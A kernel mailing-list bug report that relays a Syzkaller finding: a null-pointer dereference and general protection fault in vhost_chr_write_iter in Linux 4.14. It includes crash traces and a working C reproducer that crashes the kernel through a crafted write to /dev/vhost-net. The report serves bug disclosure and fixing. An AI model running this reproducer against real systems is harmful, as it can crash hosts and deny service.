vhost.c:LINE

Kaipeng Zeng Mon, 02 Apr 2018 19:58:04 -0700

Syzkaller hit 'UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE' bug.
Kernel: debian package linux-source-4.14, build with UBSAN enable
Log & repro:
Syzkaller hit 'UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE' bug.
tun: Universal TUN/TAP device driver, 1.6
================================================================================
UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:52:1
member access within null pointer of type 'struct rb_root_cached'
CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Call Trace:
 __dump_stack lib/dump_stack.c:17 [inline]
 dump_stack+0xcc/0x12a lib/dump_stack.c:53
 ubsan_epilogue+0xe/0x81 lib/ubsan.c:164
 handle_null_ptr_deref lib/ubsan.c:281 [inline]
 __ubsan_handle_type_mismatch+0x165/0x42c lib/ubsan.c:323
 vhost_chr_write_iter+0xe89/0x1100 [vhost]
 call_write_iter include/linux/fs.h:1773 [inline]
 new_sync_write+0x2b5/0x680 fs/read_write.c:470
 __vfs_write+0xe0/0x130 fs/read_write.c:483
 vfs_write+0x1aa/0x600 fs/read_write.c:569
 SYSC_write fs/read_write.c:615 [inline]
 SyS_write+0xc1/0x190 fs/read_write.c:607
 system_call_fast_compare_end+0x12/0x75
RIP: 0033:0x4337f9
RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213
================================================================================
kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] SMP KASAN PTI
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in: vhost_net tun vhost tap cbc ceph libceph libcrc32c
fscache bochs_drm ttm drm_kms_helper drm sg evdev joydev serio_raw
pcspkr button parport_pc ppdev lp parport ip_tables x_tables autofs4
ext4 crc16 mbcache jbd2 crc32c_generic fscrypto ecb crypto_simd cryptd
glue_helper aes_x86_64 sr_mod cdrom sd_mod ata_generic ata_piix libata
e1000 i2c_piix4 psmouse scsi_mod floppy
CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
task: ffff88002c04c000 task.stack: ffff8800221d8000
RIP: 0010:vhost_chr_write_iter+0x400/0x1100 [vhost]
RSP: 0018:ffff8800221dfb68 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000007
RDX: 1ffff100058098f9 RSI: 0000000000000202 RDI: ffff88002c04c7c8
RBP: 000000002000005b R08: fffffbfff0b156e8 R09: fffffbfff0b156e7
R10: 0000000000000001 R11: fffffbfff0b156e8 R12: dffffc0000000000
R13: 000000002000005b R14: dffffc0000000001 R15: 0000000020000040
FS:  0000000001d26880(0000) GS:ffff88007c600000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020000000 CR3: 0000000079848000 CR4: 00000000000006e0
Call Trace:
 call_write_iter include/linux/fs.h:1773 [inline]
 new_sync_write+0x2b5/0x680 fs/read_write.c:470
 __vfs_write+0xe0/0x130 fs/read_write.c:483
 vfs_write+0x1aa/0x600 fs/read_write.c:569
 SYSC_write fs/read_write.c:615 [inline]
 SyS_write+0xc1/0x190 fs/read_write.c:607
 system_call_fast_compare_end+0x12/0x75
RIP: 0033:0x4337f9
RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213
Code: 0f 84 5e 01 00 00 e8 d0 f1 1e e0 48 89 ee 48 89 df e8 45 c4 ff
ff e8 c0 f1 1e e0 48 85 db 0f 84 82 0a 00 00 48 89 d8 48 c1 e8 03 <42>
80 3c 20 00 0f 85 63 0a 00 00 48 8b 2b 48 85 ed 0f 84 0c 07
RIP: vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: ffff8800221dfb68
---[ end trace 8a7b7d9965fb1eb2 ]---



Syzkaller reproducer:
# {Threaded:false Collide:false Repeat:false Procs:1 Sandbox:
Fault:false FaultCall:-1 FaultNth:0 EnableTun:false UseTmpDir:false
HandleSegv:false WaitRepeat:false Debug:false Repro:false}
r0 = openat$vnet(0xffffffffffffff9c,
&(0x7f0000000000)='/dev/vhost-net\x00', 0x2, 0x0)
write$vnet(r0, &(0x7f0000000300)={0x1, {&(0x7f0000000040)=""/28, 0x1c,
&(0x7f0000000080)=""/158, 0x3, 0x3}}, 0x68)


C reproducer:
// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

uint64_t r[1] = {0xffffffffffffffff};
void loop()
{
  long res;
  memcpy((void*)0x20000000, "/dev/vhost-net", 15);
  res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000000, 2, 0);
  if (res != -1)
    r[0] = res;
  *(uint32_t*)0x20000300 = 1;
  *(uint64_t*)0x20000308 = 0x20000040;
  *(uint64_t*)0x20000310 = 0x1c;
  *(uint64_t*)0x20000318 = 0x20000080;
  *(uint8_t*)0x20000320 = 3;
  *(uint8_t*)0x20000321 = 3;
  *(uint64_t*)0x20000328 = 0;
  *(uint64_t*)0x20000330 = 0;
  *(uint64_t*)0x20000338 = 0;
  *(uint64_t*)0x20000340 = 0;
  *(uint64_t*)0x20000348 = 0;
  *(uint64_t*)0x20000350 = 0;
  *(uint64_t*)0x20000358 = 0;
  *(uint64_t*)0x20000360 = 0;
  syscall(__NR_write, r[0], 0x20000300, 0x68);
}

int main()
{
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
  loop();
  return 0;
}


Reproducing stats:
Extracting prog: 3m18.162628807s
Minimizing prog: 3m29.226949856s
Simplifying prog options: 0s
Extracting C: 35.30580514s
Simplifying C: 3m56.176783799s


Reproducing log:
1350 programs, 1 VMs
extracting reproducer from 1344 programs
single: executing 8 programs separately with timeout 10s
testing program (duration=10s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): mmap-syz_fuseblk_mount
program did not crash
testing program (duration=10s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
mmap-socketpair$unix-connect$unix-openat$fb0-connect$unix-socket$inet_tcp-setsockopt$sock_void-getsockopt$inet_sctp_SCTP_STREAM_SCHEDULER-ioctl$sock_inet_SIOCSIFBRDADDR-setsockopt$inet_sctp_SCTP_STREAM_SCHEDULER_VALUE-ioctl$sock_SIOCSPGRP-sendto$inet-fcntl$getownex
program did not crash
testing program (duration=10s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
openat$vnet-fcntl$F_SET_FILE_RW_HINT-write$vnet
program did not crash
testing program (duration=10s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
umount2-mmap-socket$inet_tcp-ioctl$sock_SIOCSPGRP-fcntl$F_SET_FILE_RW_HINT-openat-bind$llc-ioctl$DRM_IOCTL_ADD_CTX-ioctl$DRM_IOCTL_GET_CTX-getsockopt$inet_pktinfo-ioctl$DRM_IOCTL_ADD_CTX-setsockopt$inet_tcp_TCP_ULP-ioctl$DRM_IOCTL_NEW_CTX
program did not crash
testing program (duration=10s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
mmap-syz_open_procfs-fchown-getsockopt$bt_BT_FLUSHABLE
program did not crash
testing program (duration=10s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
openat$vnet-write$vnet-dup3-getsockopt$inet_sctp6_SCTP_STATUS-getsockopt$inet_sctp6_SCTP_GET_PEER_ADDR_INFO-write$vnet
program crashed: general protection fault in vhost_chr_write_iter
single: successfully extracted reproducer
found reproducer with 6 syscalls
minimizing guilty program
testing program (duration=15s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
openat$vnet-write$vnet-dup3-getsockopt$inet_sctp6_SCTP_STATUS-getsockopt$inet_sctp6_SCTP_GET_PEER_ADDR_INFO
program crashed: general protection fault in vhost_chr_write_iter
testing program (duration=15s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}):
openat$vnet-write$vnet-dup3-getsockopt$inet_sctp6_SCTP_STATUS
program crashed: general protection fault in vhost_chr_write_iter
testing program (duration=15s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): openat$vnet-write$vnet-dup3
program crashed: general protection fault in vhost_chr_write_iter
testing program (duration=15s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: general protection fault in vhost_chr_write_iter
testing program (duration=15s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): openat$vnet
program did not crash
testing program (duration=15s, {Threaded:true Collide:true Repeat:true
Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): write$vnet
program did not crash
extracting C reproducer
testing compiled C program (duration=15s, {Threaded:true Collide:true
Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: general protection fault in vhost_chr_write_iter
simplifying C reproducer
testing compiled C program (duration=15s, {Threaded:true Collide:false
Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0
EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true
Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE
testing compiled C program (duration=15s, {Threaded:false
Collide:false Repeat:true Procs:8 Sandbox:none Fault:false
FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true
WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: general protection fault in vhost_chr_write_iter
testing compiled C program (duration=15s, {Threaded:false
Collide:false Repeat:false Procs:1 Sandbox:none Fault:false
FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true
WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE
testing compiled C program (duration=15s, {Threaded:false
Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1
FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true
WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE
testing compiled C program (duration=15s, {Threaded:false
Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1
FaultNth:0 EnableTun:false UseTmpDir:true HandleSegv:true
WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE
testing compiled C program (duration=15s, {Threaded:false
Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1
FaultNth:0 EnableTun:false UseTmpDir:false HandleSegv:true
WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE
testing compiled C program (duration=15s, {Threaded:false
Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1
FaultNth:0 EnableTun:false UseTmpDir:false HandleSegv:false
WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet
program crashed: UBSAN: Undefined behaviour in
/root/linux-source-4.14/drivers/vhost/vhost.c:LINE
reproducing took 11m18.872190653s
repro crashed as (corrupted=false):
tun: Universal TUN/TAP device driver, 1.6
================================================================================
UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:52:1
member access within null pointer of type 'struct rb_root_cached'
CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Call Trace:
 dump_stack+0xcc/0x12a
 ubsan_epilogue+0xe/0x81
 __ubsan_handle_type_mismatch+0x165/0x42c
 vhost_chr_write_iter+0xe89/0x1100 [vhost]
 new_sync_write+0x2b5/0x680
 __vfs_write+0xe0/0x130
 vfs_write+0x1aa/0x600
 SyS_write+0xc1/0x190
 system_call_fast_compare_end+0x12/0x75
RIP: 0033:0x4337f9
RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213
================================================================================
kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] SMP KASAN PTI
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in: vhost_net tun vhost tap cbc ceph libceph libcrc32c
fscache bochs_drm ttm drm_kms_helper drm sg evdev joydev serio_raw
pcspkr button parport_pc ppdev lp parport ip_tables x_tables autofs4
ext4 crc16 mbcache jbd2 crc32c_generic fscrypto ecb crypto_simd cryptd
glue_helper aes_x86_64 sr_mod cdrom sd_mod ata_generic ata_piix libata
e1000 i2c_piix4 psmouse scsi_mod floppy
CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
task: ffff88002c04c000 task.stack: ffff8800221d8000
RIP: 0010:vhost_chr_write_iter+0x400/0x1100 [vhost]
RSP: 0018:ffff8800221dfb68 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000007
RDX: 1ffff100058098f9 RSI: 0000000000000202 RDI: ffff88002c04c7c8
RBP: 000000002000005b R08: fffffbfff0b156e8 R09: fffffbfff0b156e7
R10: 0000000000000001 R11: fffffbfff0b156e8 R12: dffffc0000000000
R13: 000000002000005b R14: dffffc0000000001 R15: 0000000020000040
FS:  0000000001d26880(0000) GS:ffff88007c600000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020000000 CR3: 0000000079848000 CR4: 00000000000006e0
Call Trace:
 new_sync_write+0x2b5/0x680
 __vfs_write+0xe0/0x130
 vfs_write+0x1aa/0x600
 SyS_write+0xc1/0x190
 system_call_fast_compare_end+0x12/0x75
RIP: 0033:0x4337f9
RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213
Code: 0f 84 5e 01 00 00 e8 d0 f1 1e e0 48 89 ee 48 89 df e8 45 c4 ff
ff e8 c0 f1 1e e0 48 85 db 0f 84 82 0a 00 00 48 89 d8 48 c1 e8 03 <42>
80 3c 20 00 0f 85 63 0a 00 00 48 8b 2b 48 85 ed 0f 84 0c 07
RIP: vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: ffff8800221dfb68
---[ end trace 8a7b7d9965fb1eb2 ]---

final repro crashed as (corrupted=false):
tun: Universal TUN/TAP device driver, 1.6
================================================================================
UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:52:1
member access within null pointer of type 'struct rb_root_cached'
CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Call Trace:
 dump_stack+0xcc/0x12a
 ubsan_epilogue+0xe/0x81
 __ubsan_handle_type_mismatch+0x165/0x42c
 vhost_chr_write_iter+0xe89/0x1100 [vhost]
 new_sync_write+0x2b5/0x680
 __vfs_write+0xe0/0x130
 vfs_write+0x1aa/0x600
 SyS_write+0xc1/0x190
 system_call_fast_compare_end+0x12/0x75
RIP: 0033:0x4337f9
RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213
================================================================================
kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] SMP KASAN PTI
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in: vhost_net tun vhost tap cbc ceph libceph libcrc32c
fscache bochs_drm ttm drm_kms_helper drm sg evdev joydev serio_raw
pcspkr button parport_pc ppdev lp parport ip_tables x_tables autofs4
ext4 crc16 mbcache jbd2 crc32c_generic fscrypto ecb crypto_simd cryptd
glue_helper aes_x86_64 sr_mod cdrom sd_mod ata_generic ata_piix libata
e1000 i2c_piix4 psmouse scsi_mod floppy
CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
task: ffff88002c04c000 task.stack: ffff8800221d8000
RIP: 0010:vhost_chr_write_iter+0x400/0x1100 [vhost]
RSP: 0018:ffff8800221dfb68 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000007
RDX: 1ffff100058098f9 RSI: 0000000000000202 RDI: ffff88002c04c7c8
RBP: 000000002000005b R08: fffffbfff0b156e8 R09: fffffbfff0b156e7
R10: 0000000000000001 R11: fffffbfff0b156e8 R12: dffffc0000000000
R13: 000000002000005b R14: dffffc0000000001 R15: 0000000020000040
FS:  0000000001d26880(0000) GS:ffff88007c600000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020000000 CR3: 0000000079848000 CR4: 00000000000006e0
Call Trace:
 new_sync_write+0x2b5/0x680
 __vfs_write+0xe0/0x130
 vfs_write+0x1aa/0x600
 SyS_write+0xc1/0x190
 system_call_fast_compare_end+0x12/0x75
RIP: 0033:0x4337f9
RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213
Code: 0f 84 5e 01 00 00 e8 d0 f1 1e e0 48 89 ee 48 89 df e8 45 c4 ff
ff e8 c0 f1 1e e0 48 85 db 0f 84 82 0a 00 00 48 89 d8 48 c1 e8 03 <42>
80 3c 20 00 0f 85 63 0a 00 00 48 8b 2b 48 85 ed 0f 84 0c 07
RIP: vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: ffff8800221dfb68
---[ end trace 8a7b7d9965fb1eb2 ]---

UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE

Reply via email to